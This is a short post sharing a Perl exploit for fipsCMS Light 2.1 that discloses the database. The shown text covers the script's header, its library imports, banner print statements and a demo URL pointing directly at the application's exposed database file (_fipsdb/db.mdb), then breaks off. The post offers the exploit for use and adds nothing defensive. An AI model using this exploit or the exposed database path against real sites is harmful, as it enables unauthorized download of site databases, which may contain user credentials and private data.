fipsCMS Light 2.1 Database Disclosure Exploit
I wrote this a long time ago and thought post here.Link to packetstormsecurity #!/usr/bin/perl # # fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit # # Exploit by d3b4g # script:http://fipsasp.com # Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb # From Tiny little island of maldivies use LWP::Simple; use LWP::UserAgent; print “\fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit\n”; print “\t****************************************************************\n”; print [...]